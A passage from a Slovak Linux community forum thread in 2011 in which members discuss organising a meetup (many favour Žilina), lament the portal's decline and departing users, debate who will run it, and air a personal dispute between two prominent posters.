                        • Re: Máme radi LinuxOS 14.08.2011 | 13:07
                          Avatar borg Fedora  Administrátor
                          a co tak vymenovat vsetkych 79 okresov? nie kazdemu sa chce cestovat do druheho okresu.
                          • Re: Máme radi LinuxOS 14.08.2011 | 13:16
                            Avatar Dare_devil Debian, OpenSuse  Používateľ
                            A co tak objednat karavan a prejst s nim cele slovensko a stretavat ludi ? Stale niekde pri vode, v lese, posedenicko pri ohni..
                            There is no flag large enough to cover the shame of killing innocent people
                            • Re: Máme radi LinuxOS 14.08.2011 | 14:47
                              WlaSaTy   Návštevník
                              Niektorí ľudia sa kôlivá lenivosti neprestanú hádať. Už len čakám, kedy niekto zahlási že by sa to stretnutie malo kamerovať a nahrať niekam na rýchlu linku. Aby tam nemali dôvod ísť.
                              • Re: Máme radi LinuxOS 14.08.2011 | 14:53
                                Avatar borg Fedora  Administrátor
                                ohladom streamingu si ma predbehol.
                                • Re: Máme radi LinuxOS 14.08.2011 | 16:10
                                  WlaSaTy   Návštevník
                                  A dopr...
                          • Re: Máme radi LinuxOS 14.08.2011 | 14:53
                            Avatar Stanislav Hoferek Greenie 18.04  Používateľ
                            toto je pár miest, ktoré ma napadli ako blízke stredu republiky s nejakou tou normálnou možnosťou dostať sa tam.
                        • Re: Máme radi LinuxOS 14.08.2011 | 15:14
                          Avatar Dare_devil Debian, OpenSuse  Používateľ
                          Tu je odkaz na anketu, ktora sa konala pred par rokmi priamo tu na LinuxOS.sk http://linuxos.sk/anketa_show/20/index.html
                          There is no flag large enough to cover the shame of killing innocent people
              • Re: Máme radi LinuxOS 14.08.2011 | 19:14
                Avatar default Debian  Používateľ
                ja som nikdy na ziadnom linuxovom stretnuti nebol, ale siel by som keby to bolo dakde v mojej blizkosti, a v case kedy by to slo, len neviem co tam robite, asi donesiete NTB a sa chvastate svojimi systemamy :D , ale ja ntb nemam a nikdy som nemal a ani nechcem, ja som zastanca PC-tower
                R.K
    • Re: Máme radi LinuxOS 14.08.2011 | 18:19
      Avatar Miroslav Bendík Gentoo  Administrátor
      Celkom fajn linuxové stretnutia bývavali v Žiline (to boli ešte časy keď som ja niečo organizoval ...). Myslím, že Žilina je tak celkom fajn mesto na takéto stretnutie, nie je moc ďaleko ani zo západného Slovenska, ani z východného Slovenska a prechádza cez ňu hlavné železničné spojenie BA - KE.
      • Re: Máme radi LinuxOS 15.08.2011 | 01:20
        Avatar maor Mint, Debian, Raspbian, LibreELEC  Používateľ
        "a prechádza cez ňu hlavné železničné spojenie BA - KE."

        A nie len to, kúsok od Žiliny v Dolnom Hričove máme aj medzinárodné letisko :D
        Sorry za spam.
        • Re: Máme radi LinuxOS 15.08.2011 | 09:00
          Avatar bedňa LegacyIce-antiX  Administrátor
          V Hričove straší :) Inak Žilina je v pohode, za to by som bol.
          Táto správa neobsahuje vírus, pretože nepoužívam MS Windows. http://kernelultras.org
      • Re: Máme radi LinuxOS 15.08.2011 | 17:27
        XjCook   Návštevník
        tiež som za Žilinu hlavne kvôli železničnému spojeniu ;)
      • Re: Máme radi LinuxOS 16.08.2011 | 12:54
        Avatar dodoedo Fedora Linux  Používateľ
        Žilina je fajn miesto, keďže tu bývam ..
        aspoň potrasiem pravicou a uvidím niektorých osobne ...
        G. Orwell: "Čím více se společnost vzdaluje od pravdy, tím více bude nenávidět ty, kteří ji říkají."
        • Re: Máme radi LinuxOS 16.08.2011 | 12:57
          Avatar borg Fedora  Administrátor
          aby niektory do ziliny dosli, musi ta akcia stat za to. ziadne stretunutie o 18:00 v krcme a ozran party.
          • Re: Máme radi LinuxOS 16.08.2011 | 15:24
            Avatar bedňa LegacyIce-antiX  Administrátor
            Ale tak vyzerajú stretká linuxákov na celom svete, akurát súhlasim s tebou, že 18:00 je zlý čas, v krčme treba sedieť už doobeda :)
            Táto správa neobsahuje vírus, pretože nepoužívam MS Windows. http://kernelultras.org
            • Re: Máme radi LinuxOS 17.08.2011 | 00:53
              Avatar Miroslav Bendík Gentoo  Administrátor
              Tak tak, naposledy som to riešil od poobedia aby boli nejaké prednášky a potom ožranackia hlavne pre študentov.
    • Re: Máme radi LinuxOS 15.08.2011 | 18:47
      dash   Návštevník
      Tak kona sa nieco niekde?
      Nejako som nepochopil, kde mam prist ;)
      • Re: Máme radi LinuxOS 15.08.2011 | 18:58
        Avatar Stanislav Hoferek Greenie 18.04  Používateľ
        ty si všade tam, kde sa niečo deje :) ale tak množia sa ľudia, ktorím vyhovuje mesto Žilina :)
        • Re: Máme radi LinuxOS 16.08.2011 | 00:02
          Avatar dash Gentoo  Používateľ
          Zilina mi vyhovuje, len treba urcit cas a miesto :) Bedna by sa na to mohol podujat, co ty na to Bedna?

          Bolo by dobre spravit pool s miestom a casom, kedy komu vyhovuje napr. na http://www.doodle.com
          • Re: Máme radi LinuxOS 16.08.2011 | 08:22
            Avatar bedňa LegacyIce-antiX  Administrátor
            Najprv treba rozhodnúť miesto, keď to bude. Potom by bolo dobré, aby človek z toho mesta navrhol možnosti kde sa stretnúť, pretože napríklad o Žiline toho moc neviem :)
            Táto správa neobsahuje vírus, pretože nepoužívam MS Windows. http://kernelultras.org
        • Re: Máme radi LinuxOS 20.08.2011 | 20:51
          senux   Návštevník
          Zdravim pani, ja som z LM a rad pridem na nejaku linuxovu akciu,kde? cokolvek na trase od Kosic az do Bratislavy.
    • Re: Máme radi LinuxOS 20.08.2011 | 17:46
      Avatar ferry openSUSE Leap  Používateľ
      Chcel by som sa rozlúčiť s týmto fórom.
      Pred pár rokmi to tu bolo celkom dobrým zdrojom informácií.
      Aj keď veľa neprispievam, ale sa snažím aspoň sledovať a prečítať si.
      Lenže poslednú dobu to tu je len o pár jedincoch, ktorí sa medzi sebou hádajú a urážajú sa.
      Ide to tu proste dole vodou.
      Je čas pohnúť sa inde.

      Chcem zároveň požiadať administrátorov o zrušenie môjho nicku.
      Vopred ďakujem.
      • Re: Máme radi LinuxOS 20.08.2011 | 17:49
        Avatar default Debian  Používateľ
        nazabudni navstivit novy portal superuser.sk ked bude hotovy ;) . cau
        R.K
        • Re: Máme radi LinuxOS 20.08.2011 | 20:53
          Avatar Miloš Linux Mint, Ubuntu studio  Používateľ
          Tiež ďakujem za toto fórum lebo mi strašne pomohlo a vlastne to bola moja jediná pomoc pri začiatkoch z Linuxom. A nový portál určite navštívim aj ja :)
          http://necyklopedia.wikia.com/wiki/Linux
      • Re: Máme radi LinuxOS 20.08.2011 | 22:08
        Avatar dodoedo Fedora Linux  Používateľ
        Jeden z nich práve teraz, keď dourážal ostatných, práve z Fóra odchádza, však ferry ,,, ;-)

        Takéto patetické somarinky bez objektívnosti si všetci nechajte pre seba .. nikto tu nikoho nezdržuje ani nevyhadzuje a preto ani nikoho nezaujíma kedy prídeš, kedy odídeš a čo robíš ...
        ;-)
        G. Orwell: "Čím více se společnost vzdaluje od pravdy, tím více bude nenávidět ty, kteří ji říkají."
        • Re: Máme radi LinuxOS 20.08.2011 | 22:22
          Avatar Tomáš Srnka Barz čo, už asi všetko  Administrátor
          mozno by ta malo zacat zaujimat, ze ludia odchadzaju lebo sa spravate jak kohuti na smetisku.

          mna to tu tiez nebavi sledovat, obcas dakto napise nieco rozumne, sak si len precitaj tento thread!
          Dlho som robil linuxos.sk, neskôr založil vpsFree.cz, posledných pár rokov ako tech. riaditeľ vo Websupporte
          • Re: Máme radi LinuxOS 20.08.2011 | 22:46
            Avatar dodoedo Fedora Linux  Používateľ
            Tomáš, ja sa správam ako kohút na smetisku ??

            To nemyslíš vážne !
            G. Orwell: "Čím více se společnost vzdaluje od pravdy, tím více bude nenávidět ty, kteří ji říkají."
            • Re: Máme radi LinuxOS 20.08.2011 | 23:12
              Avatar Milan Dvorský debian,mint kde,android  Administrátor
              ja uz radsej nekomentujem. ale aj tu v tomto vlakne sa prejavil jeden z dovodov mojho znechutenia a ukoncenia posobenia na pozicii sefredaktora ...
              • Re: Máme radi LinuxOS 20.08.2011 | 23:25
                Avatar dodoedo Fedora Linux  Používateľ
                Ale, ruku na srdce eMDi, aj teraz keď nekomentuješ - ako sám vraviš - vlastne komentuješ toto tu ...

                ;-)

                Neboj sa a napíš explicitne všetko čo Ti leží na srdci, lebo ináč je to iba komentovanie ...

                :-)
                G. Orwell: "Čím více se společnost vzdaluje od pravdy, tím více bude nenávidět ty, kteří ji říkají."
                • Re: Máme radi LinuxOS 21.08.2011 | 00:18
                  Avatar Milan Dvorský debian,mint kde,android  Administrátor
                  co ti mam napisat? ze ma stvu tieto zabomysie vojny? nezmyselne utoky na druhych? len kecy a prazdne sluby od mnohych? a reci v style "po vojne je kazdy general" ? toto si chcel pocut? sa pozri za posledne dni, kolko ludi poziadalo o zrusenie nicku. citim sa ako nekompetentne hovado, ktore nedokazalo za tie dva roky ci kolko dosiahnut solidny stav portalu.
                  • Re: Máme radi LinuxOS 21.08.2011 | 01:14
                    WlaSaTy   Návštevník
                    Kľud, nadýchni sa z hlboka. Teba tu ešte niekto dokáže vytočiť? Poď robiť k nám, to Ti zocelí nervy. A navyše. Ajtak už dávno vieš čo znamenajú priority.
                    • Re: Máme radi LinuxOS 21.08.2011 | 01:25
                      Avatar Milan Dvorský debian,mint kde,android  Administrátor
                      som uz pomerne kludny. a dakujem, uz som robil a neprijmu ma druhykrat. ... a viem, co znamenaju ...
              • Re: Máme radi LinuxOS 21.08.2011 | 11:16
                Avatar Miroslav Bendík Gentoo  Administrátor
                Kto je momentálne teda šéfredaktor ak sa smiem spýtať? Ak nie je žiaden kandidát mohol by som to prebrať? Kedysi som sľúbil, že odchádzam len dočasne, mohol by som to zatiaľ prebrať kým sa nenájde niekto lepší.
                • Re: Máme radi LinuxOS 21.08.2011 | 16:45
                  Avatar Milan Dvorský debian,mint kde,android  Administrátor
                  ja neviem, kto ma kluce od miesacky, ale kludne to prevezmi. budem rad, ak to tu bude niekto riadit.
                  • Re: Máme radi LinuxOS 21.08.2011 | 17:10
                    Avatar Stanislav Hoferek Greenie 18.04  Používateľ
                    prehľad má, nadhľad tiež, nevidím prekážky :)
                    • Re: Máme radi LinuxOS 21.08.2011 | 17:13
                      Avatar borg Fedora  Administrátor
                      ale uz to tu raz viedol, ze? :)
                      • Re: Máme radi LinuxOS 21.08.2011 | 18:11
                        Avatar Miroslav Bendík Gentoo  Administrátor
                        Hej asi 3 mesiace počas školy a zistil som, že proste ešte popri zamestnaní to nejde ;)
                        • Re: Máme radi LinuxOS 21.08.2011 | 20:34
                          Avatar borg Fedora  Administrátor
                          nuz niekedy je lepsie si menej nalozit ;)
                        • Re: Máme radi LinuxOS 21.08.2011 | 22:26
                          Avatar bedňa LegacyIce-antiX  Administrátor
                          Ber to a makaj, v prvom rade jednu tabuľku na blogy :) Tak sa nám prečistí obsah fóra.
                          Táto správa neobsahuje vírus, pretože nepoužívam MS Windows. http://kernelultras.org
                          • Re: Máme radi LinuxOS 21.08.2011 | 22:54
                            Avatar Milan Dvorský debian,mint kde,android  Administrátor
                            http://blogy.linuxos.sk/ ...
                            • Re: Máme radi LinuxOS 21.08.2011 | 23:36
                              Avatar bedňa LegacyIce-antiX  Administrátor
                              To je nejaká pre alfa? :)
                              Táto správa neobsahuje vírus, pretože nepoužívam MS Windows. http://kernelultras.org
                              • Re: Máme radi LinuxOS 21.08.2011 | 23:52
                                Avatar Milan Dvorský debian,mint kde,android  Administrátor
                                zial, nestihol som to uz prepojit s DB userov na linuxos ... to mas tak, ked si na vsetko takmer sam ...
                                • Re: Máme radi LinuxOS 22.08.2011 | 00:16
                                  Avatar bedňa LegacyIce-antiX  Administrátor
                                  To ti verím a s malým dieťatkom, ktoré toho času poriadne odkrojí to nieje žiadna sranda. Chce to veľa voľného času a energie. Mirec skončil školu, tak by sa do toho mohol obuť a nájsť aspoň jedného dvoch dobrovoľníkov, ktorý pomôžu. Ja tiež toho voľného času mám málo, tak si ho rád užívam odpočinkom, ale občas môžem helpnúť. Tak som začal článkom, správičkou a Mirec má na mňa jabber, takže aj s PHP môžem občas helpnúť.
                                  Táto správa neobsahuje vírus, pretože nepoužívam MS Windows. http://kernelultras.org
                                  • Re: Máme radi LinuxOS 22.08.2011 | 00:21
                                    Avatar Milan Dvorský debian,mint kde,android  Administrátor
                                    ja uz nerad, ale davam od celeho portalu ruky prec, takze aj miro ak prepise vsetky kontakty na vedenie portalu uz moze mi vziat admin prava ...
          • Re: Máme radi LinuxOS 21.08.2011 | 00:21
            Avatar bedňa LegacyIce-antiX  Administrátor
            Ja už mám pocit, nech tu spraví hocikto hocičo, všetko je zlé, nič moc sa tu nestalo. Je pravda, že to zanietenie linuxákov už nieje ako kedysi, ale to je prirodzený vývoj, v Linuxe už nieje skoro čo riešiť, s týmto sa potýkajú aj ostatné portály. Väčšina vecí ide na klik, kolegovi hovorím, vyskúšaj Ubuntu, sám si ho nainštaloval, má tam všetko čo potrebuje a za rok sa ma ani raz nespýtal na nejaký problém. Ľudia majú ďaleko väčšie problémy a z nejakých diskusií, kde sa občas rozoberie aj niečo navyše si hlavu nerobím a čudujem sa že vy áno. Ľudia majú rozdielne názory na veci s tým sa v živote nestretávate, alebo ich upaľujete? Treba sa zmieriť s tým staré časy sú preč a hľadať možnosti ako ísť ďalej.
            Táto správa neobsahuje vírus, pretože nepoužívam MS Windows. http://kernelultras.org
            • Re: Máme radi LinuxOS 21.08.2011 | 01:01
              Avatar default Debian  Používateľ
              ja som s linuxu nadseny stale, objavujem nove veci a idem do zlozitejsieho, podla mna jediny rozdiel je v tom ze dakedy nebolo ziadne ubuntu, vsetko bolo zlozite a tak bola vecsia aktivita ohladne otazok, ale aj dnes existuju super zlozite veci, ale ludia si skor zvolia jednoduchsiu cestu (sa mi zda), to ale neznamena ze nadsenci uz neeixsutuju, podla mna hlavny problem tu je stary shakal a zviky niktorych uzivatelov nicit zaujimave diskusie :) , podla mna sa zacnu veci menit so vznikanim novych portalov
              R.K
              • Re: Máme radi LinuxOS 21.08.2011 | 01:27
                Avatar bedňa LegacyIce-antiX  Administrátor
                Bratm ty si kapitola sama o sebe, od teba by sme sa mali aj mi priučiť, ako ofúkať staré dobré časy. Tebe môžem len popriať, nech ti to nadšenie vydrží a veľa zdaru. Prv takýto ľudia pribúdali, dnes nováčikovia ani neodpíšu či im to pomohlo.
                Táto správa neobsahuje vírus, pretože nepoužívam MS Windows. http://kernelultras.org
                • Re: Máme radi LinuxOS 21.08.2011 | 02:02
                  Avatar Stanislav Hoferek Greenie 18.04  Používateľ
                  jednoduché riešenie, naklonovať Radovana. Pýta sa, pomáha, stále niečo inteligentné rieši a skúša. To by bolo :)

                  mne osobne sa zdá, že sa znižuje záujem o fóra aj preto, že nie je toľko distribúcii. Kedysi Mandrake, Debian atď, všetko tak aspoň trochu vyrovnané. Teraz? Ubuntu sem, Ubuntu tam, Ubuntu v meste, Ubuntu na dedine... Dnes je Ubuntu fakt všade, čo je tak dobre, až je to úplne zle :)
                • Re: Máme radi LinuxOS 21.08.2011 | 10:12
                  Avatar default Debian  Používateľ
                  aj za tie roky co sa linux zjednodusil som
                  z niektorych odpovedi ludi ktory linux vyskusali prisiel na to ze hlavny problem je to ze sa nechcu nic nove naucit, casto to vzdali aj s ubuntu hned na zaciatku pretoze mali inu ikonku nastavenia internetu, alebo im neslo spustit exe subor dvojklikom, hned sa takeho lacneho mozno len LiveCD si spravili obraz nie o ubuntu napriklad, ale o celom linuxe a stali sa zatvrdlimi windowsakmi, ktory mozno ku svojmu pouzivaniu pocitaca ani nepotrebuju windows, trebars len chatuju, pisu maili, sem tam nieco nakreslia, vytvoria dake dokumenty, preto s prichodom noveho portalu superuser.sk som dostal napad ako by sa mohlo nieco taketo zlomit, vsimol si jednu vec, ked aj sa pyta ako sa vo fluxboxe meni pozadie povie mu dakdo, kukal si google? , alebo podobne nejak aj ked mu neda odpoved len ho navadza tak sa uzivatelia zviknu nastvat, alebo niesu tak spokojny ako s odpovedou $ fbsetbg /path/to/background.image, viem ze je to ich problem, ale ak chceme nieco dosiahnut podla mna by sme mali byt viac privetivi, napriklad ja ked som mnohym radil, nie na fore, hlavne na IM,alebo aj osobne ked zacinali, ja som im to pchal vislovene pod nos, ak bol aj kompletny navod v anglicite tak som mu ho zjedodusil a dal slovensky, napriklad brat povedal ze nikdy nezacne s linuxom, lebo sa mu zdal komplikovany a nekvalitny, ale ako som mu vsetko povedal a viedol ho ako to slo tak sa mu zapacil a teraz ma linux aj doma aj v praci (programator php), dalsia vyhoda takychto odpovedi je ze ked to bude dakdo hladat trebars o roky neskor, tie odkazy ktore ste pohadzali uz mozu byt neplatne a uzivatel sa nemusi dozvediet s toho nic, uzivatelia boli velmi vdacni za take odpovede, takimto pristupom chcem pomoc na novom portale, a pripravujem uz dake clanky pre zaciatocnikov aby sa im to este zjednodusilo. tu okolo linuxos.sk je uz taka atmosfera rozpadu a preto uz tak nelaka novych uzivatelov ktory radsej prejdu ku konkurencii alebo na ceske weby
                  R.K
            • Re: Máme radi LinuxOS 21.08.2011 | 02:30
              Avatar Stanislav Hoferek Greenie 18.04  Používateľ
              Rozdielne názory? Keby boli všetci rovnakí, bola by šialená nuda :)
    • Re: Máme radi LinuxOS 21.08.2011 | 12:39
      Avatar Róbert Dúbravský PC Debian alebo Ubuntu - servery Debian  Používateľ
      Ahojte
      Dlho som uvažoval či napíšem ešte do tohoto vlákna. Ak sa nenahneváte, tak skúsim.

      1. LinuxOS je ešte stále číslo 1 čo sa týka návštevnosti a výsledkov vyhľadávania. Síce články niesu, a sú tu nejaké problémy (hádky), v podstate na každom portáli sú nejaké starosti. Ale čo už.

      Ale na druhej strane je tu kvantum tém na fóre a niekoľkoročná tradícia (viac ako 5rokov). S novým portálom na inej doméne to také ružové nebude. My fungujeme (LinuxON) 2 roky a poniektorí o nás ani nevedeli a takých je dosť.
      Takže najcennejšie ten "základ" linuxos stále má, tak ho nepochovávajte.

      Ja (TREBOR) s Tomášom Hanzelom sme si mysleli že keď spravíme LinuxON, tak sa LinuxOS trošku "preberie" k životu. Lebo je to taká priateľská "konkurencia". Prečo priateľská konkurencia? Lebo toto nieje biznis. Nikto z nás to nerobí pre biznis.
      Môžem to potvrdiť z vlastnej skúsenosti. Robil sa nový dizajn na LinuxOS, no predsa však aj my spravíme nie? tak sme robili nove dizajny obaja, a sme sa tešili na nové veci. S emdim sme si vymenili informácie ako čo pokračuje, ja som ukázal ako vyzerá nový design u nás, Emdi zase nový LinuxOS. Nakoniec sa nový design na linuxOS nedokončil, a ja som mal svoj na 70%, tak som písal emdimu že nech sa nehnevá, ale ja to už doklepnem. Keby sa nerobil nový dizajn na LinuxOS, nemali by sme my nový dizajn tak skoro.

      Boli plány, Emdi sa fakt snažil, zháňal reklamu, lepšie za zoženie reklama na 2 portály ako na jeden, je tam väčší záber. Aj sa pár mesiacov tak fungovalo. A za to Ti Emdi veľmi ďakujem. Objednávka hocičoho sa lepšie vybavuje pre 2 portály ako pre jeden. A tak ďalej by som mohol pokračovať. Napríklad nie je problém prepojiť linky na portáloch. My sme aj tak fungovali viac ako mesiac sme ťahali články z linuxOS na titulku linuxON. Prečo sa to nedalo obojstrane, to už neriešim.

      2. Po druhé hádky. Keď sa pozerám na tie hádky spätne väčšinou sú tam 2 ľudia. Je to možné aby "položilo" LinuxOS jeden prípadne 2 ľudia? Ja si myslím že je to ZLE.

      Dododedo, dávaš správy už peknú dobu, už nemáš päť rokov, načo máš uštipačné poznámky, ktoré len potom provokujú niektorých jedincov k hádkam. Odvádzaš kus roboty a potom sa to takto znehodnocuje. Prízvukujem, že nemám nič proti tebe, tak to prípadne neber že na Teba útočím.

      Niekto písal že správičky sú niekedy písane aj nejakými poznámkami. Tak ten čo ich povoľuje nech ich zedituje. A hotovo. Ak niekto bude mať chuť si napísať názor nech si napíše. Ale bez nadávok, a urážok! Také komenty tvrde mazať. Nikoho nezaujíma kto kde začal a ten to vracia tomu a tomu. A henten písal niekde a tak. Vykašlite sa už nato. Keď vidím že niekto niekoho uráža nahláste to adminovi, nech sa to rieši. Však Emdi to už tu písal. Viem že to vyžaduje čas, ale ináč sa nedá.

      Stano je kapitola sama o sebe. Či sa páči či nie, STANO je osobnosť v opensource. To je fakt. A je niekedy ako neriadená strela. Preto Eduard si starší, mal by si vedieť ako v takýchto situáciach sa zachovať. Každý si sám potom urobí vlastný názor.


      3. Vôbec nerozumiem tým pár jedincom čo si chcú vymazať nicky. Popravde som z toho šokovaný. Ale pravdepodobne majú v tom prsty tie hádky. Že tie osoby to takto riešia.

      Chel by som ešte napísať, že nikto z nášho redakčného tímu nepodnikal kroky proti LinuxOS či už urážky alebo spamovali tento portál odkazmi na LinuxON. Sme dospelí normálni ľudia a nato si LinuxOS dosť vážime.

      Sám som zvedavý ako to dopadne, držím palce. Miro Bendík má chuť to tu viesť, má chuť programovať. Tak mu alebo tomu kto sa o to bude starať, zbytočne neháčte polená pod nohy.

      Teraz rozmýšľam či to postnem, či sa oplatilo obetovať 1 hodinu môjho zaneprázdneného času na tento post. Verím, že to hádam malo zmysel... Chalani držte sa.
      • Re: Máme radi LinuxOS 21.08.2011 | 14:17
        Avatar bedňa LegacyIce-antiX  Administrátor
        Pekne napísané.

        Čo sa týka správičiek, tak práve tie drobné poznámky sa mi páčia, viď. posledné správičky o boji proti Androide. Neviem čo komu na tom môže vadiť a pokiaľ už aj toto má rozdeľovať ľudí, tak je škoda niečo robiť.
        Táto správa neobsahuje vírus, pretože nepoužívam MS Windows. http://kernelultras.org
        • Re: Máme radi LinuxOS 21.08.2011 | 14:20
          Avatar Stanislav Hoferek Greenie 18.04  Používateľ
          na to si hocikto urobí názor a práve na to sú správičky. Všetci nech sa môžu vyjadriť k tomu, čo sa deje s androidom, či už sú z toho nadšený, alebo nie. Správička však má informovať, nie prikladať názor, ktorý môže byť niekedy naozaj nevhodný. Aspoň tak je to na viac miestach. Správička je správička, krátka správa, nie blogový príspevok.
          • Re: Máme radi LinuxOS 21.08.2011 | 14:53
            Avatar bedňa LegacyIce-antiX  Administrátor
            Zaujímavé, že keď som tieto Edove správičky nalinkoval na iný linuxový portál, tak sa nad tým nikto nepozastavil. Suchariny je všade dosť a toto je dôvod, prečo tu rád správičky čítam, ale s tými inkriminovanými nesúhlasím, to sem fakt nepatrí.
            Táto správa neobsahuje vírus, pretože nepoužívam MS Windows. http://kernelultras.org
          • Re: Máme radi LinuxOS 21.08.2011 | 14:57
            Avatar borg Fedora  Administrátor
            dodoedo ma dobre spravicky, nie su nudne. to ze tam je jeho nazor je v pohode, aj tak sa vo vacsine zhoduje s nazormi ludmi, ktory preferuju open source (teda mozno aj teba).
            • Re: Máme radi LinuxOS 21.08.2011 | 15:15
              Avatar Stanislav Hoferek Greenie 18.04  Používateľ
              áno, to áno, ak sa napríklad spomenie fakt divné šialenstvo ohľadne patentov, tak má väčšina ľudí na to rovnaký názor, aj ja.

              Niektoré časti, ako napríklad toto, sú tak trochu na rozmedzí, no dajú sa bez problémov stráviť a asi nikomu nevadia:

              "Je to šokujúce a zároveň nechutné pre takú známu spoločnosť akou je Apple, a už dávno to nemá nič spoločné s hospodárskou súťažou v kapitalizme ... "

              Niektoré sú však tak trochu viac blogovo ladené a tak celkom nepatria do správičiek:

              "Samsung v odpovedi hovorí o šialenosti a ja sa musím ísť tiež nadýchať čerstvého vzduchu, fuj ... "

              Čím nechcem povedať, že je to zle, len... zdá sa mi to vhodnejšie pridať ako komentár pod správičkou, než priamo do správičky.
              • Re: Máme radi LinuxOS 21.08.2011 | 15:18
                Avatar borg Fedora  Administrátor
                stale mi to pripada lepsie ako infantilne prispevky...
      • Re: odpoveď 22.08.2011 | 14:42
        Avatar dodoedo Fedora Linux  Používateľ
        Ahoj.

        Ad "Dododedo, dávaš správy už peknú dobu, už nemáš päť rokov, načo máš uštipačné poznámky, ktoré len potom provokujú niektorých jedincov k hádkam."

        čo sa týka uštipačných poznámok, je to moja vlastnosť, ktorú používam, keď sa mi zdá, že vidím falošné konanie, znehodnocujúce prácu ostatných - vtedy reagujem. Nie je pravda, že celý portál (a jeho stabilita/nestabilita) je závislá na dvoch ľudoch Eduard Šurina a Stanislav Hoferek. Tento portál má stále silu a sám som pred nedávnom písal, že je aj najsledovanejším slovenským (a sčasti aj moravským ) portálom a nikto to nezmení. Ja sa domnievam, že na slovenskej scéne (okrem undergroundu) tak trochu aj odzrkadľuje súčasný stav slovenskej linuxovej komunity, taký aký je rozporuplný ...


        Ad "Niekto písal že správičky sú niekedy písane aj nejakými poznámkami. Tak ten čo ich povoľuje nech ich zedituje. A hotovo. Ak niekto bude mať chuť si napísať názor nech si napíše. Ale bez nadávok, a urážok! Také komenty tvrde mazať. Nikoho nezaujíma kto kde začal a ten to vracia tomu a tomu. A henten písal niekde a tak. Vykašlite sa už nato. Keď vidím že niekto niekoho uráža nahláste to adminovi, nech sa to rieši."

        Situácia sa rokmi vyvinula tak, že v systéme okrem Milana, administrujem Správy ja (schvaľovanie, edit, pozor žiadny výmaz HOCIČOHO na to už nemám práva, boli mi odobraté kedysi ...)
        snažím sa rýchlo každú správu pozrieť po formálnej a funkčnej stránke a zverejňujem/schvaľujem ju. Z lásky k Linuxu (ekosystému) pridávam aj zriedka akási "doprovod", ktorý odráža moju slobodu. vyjadrovania. Lenže aj tak sa nájde jedinec, ktorý má potrebu napísať do komentára správy (aj hulvátske) veci, týkajúce sa dodoeda a nie základu informácie v Správe samotnej. Pokiaľ mi niekdo nadáva, nemám technickú možnosť to vymazať, ale robia to iný admini tuná ...

        Ad "Stano je kapitola sama o sebe. Či sa páči či nie, STANO je osobnosť v opensource. To je fakt. A je niekedy ako neriadená strela. Preto Eduard si starší, mal by si vedieť ako v takýchto situáciach sa zachovať. Každý si sám potom urobí vlastný názor."

        Mňa osobne, kedže som si všimol, že má akési problémy, Stanislav Hoferek nezaujíma a ani ako osoba v OS , vysvetľuj si to akokoľvek, je mi to šuma-fuk. Avšak z dôvodov uvedených vyššie IBA REAGUJEM na dané skutočnosti, ktoré robí tento jedinec zverejňovaním všelijakých príspevkov do všelijakých médií kde explicitne menuje linuxos.sk a nereagujem na nadávky, ktorými ma častujú hojne ostatní, prečo ? Ja som sa s tým vopred vyrovnal, keď som išiel pred veľa rokmi do toho ...
        Uvediem čerstvý príklad: keď som napísal že píše blbosti o linuxos.sk,. odpisovali ste, že sa jedná a rok starý článok v jeho blogu, v poriadku myslím si hádam sa zmenil a prestal krivdiť linuxos.sk. Prted časom som si pozrel opäť jeho blog a prvé čo vidím je jeho blogová ničiteľská snaha. Opäť nedodržal akési tiché ujednanie a znova píše somariny o linuxos.sk a jeho ľudoch ... dokonca tam doplnil ako sám tu drzo napísal ďalšie linky, no ak sa má TAKTO CHOVAŤ ako píšeš osobnosť v Open-Source slovenskej komunity, tak ja budem sám prvý maličký člen (Dodoedo I.) komunity, ktorý je proti tomuto vystupovaniu.

        BTW,

        Dodoedo I. znamená sebairóniu, z ktorej sa zasa ja potichu smejem v súkromí, a nie moje vládcovske sklony


        Ak ma ešte niečo úprimné napadne, tak dopíšem ...
        G. Orwell: "Čím více se společnost vzdaluje od pravdy, tím více bude nenávidět ty, kteří ji říkají."
        • Re: odpoveď 22.08.2011 | 15:09
          Avatar Stanislav Hoferek Greenie 18.04  Používateľ
          dátumy fakt nesleduješ, však? posledných asi 5 útokov bolo na mňa z tvojej strany za to, že som v minulosti napísal, že robíš nesprávne rozhodnutia.

          schválne, najnovší "konflikt" v osnove:

          1) na linuxos sa píše o superuser.sk, v ktorom si začal urážať všetkých okolo
          2) dal som na root.cz tvoje názory, aby sa k tomu mohli ľudia vyjadriť
          3) útočíš na mňa za to, že som si dovolil skopírovať tvoje názory. útočíš teraz na niečo, čo som zverejnil už dávnejšie

          ty sa hneváš na mňa za to, že som zverejnil tvoje názory na svet a že údajne urážam linuxos, ja sa hnevám na teba preto, lebo neustále útočíš a aj keď si nikdy nič "nevyhral", stále to opakuješ. Len preto, že si nedokážeš priznať vlastnú chybu. Ja si prajem uzmieriť sa, eMDík si to praje, Bedňa... mám pokračovať ďalej? No ty neustále útočíš tak hlúpymi spôsobmi, ako je napríklad písanie správičiek. Opakovane si myslím, že robíš nesprávne rozhodnutia a ja som hlupákom, že ti odpisujem. Koľko ľudí z LinuxOS odchádza pre tvoju neústupnosť (a moju tiež)? Byť tu adminom, zavediem pravidlo. Od vtedy a vtedy osobné útoky mazať a za neústupnosť ban. Potom by sa ukázala sila portálu, ktorý ničíš. Áno, bez problémov napíšeš "stanko hoferek ničiteľ", no ak by sa urobilo hlasovanie, kto najviac poškodzuje tento web, bolo by tam tvoje meno na prvej priečke.

          Ešte raz: nemám nič proti LinuxOS, je to dobrý projekt. Mám však otvorene problém s tvojim správaním, ktoré by určite nemalo byť také, aké je.

          P.S. vieš, kto vytvoril tému s názvom "Máme radi LinuxOS" ? Človek, ktorý má rád LinuxOS. Viac ako ja a viac ako ty. Zahrajme sa, súhlasme obaja s tým, že neajké tie hádky budeme riešiť súkromne. Ďalšia možnosť je zmazať všetky konfliky. Tak teba, ako aj mňa. Môže to urobiť akýkoľvek admin a ak by dal niekto administrátorské práva mne na túto jedinú činnosť a hneď po tom by som sa ich vzdal, tak by som to urobil. Vymazal by som všetky príspevky, správy a neviem čo, na základe ktorých považujú ľudia s IQ od 70 do 160 nás dvoch za hlupákov.
          • Re: odpoveď 22.08.2011 | 15:47
            Avatar gs_peter Mac OS X, iOS  Používateľ
            chalaniii, keby tu vas nebolo, ani sem nechodim, bavite ma kazdy den, samozrejme, ze netusim, co je prapovod konflliktu, ale ani m ato nezaujima, proste sa bavim a myslim, ze linuxova komunita je presnym odrazom vas dvoch a presne tak isto aj funguje, ci si to priznate alebo nie, proste linux bude tam kde je dovtedy, pokial sa ludia ako vy nebudu vediet dohodnu, resp. obist, jeden variant to byt musi

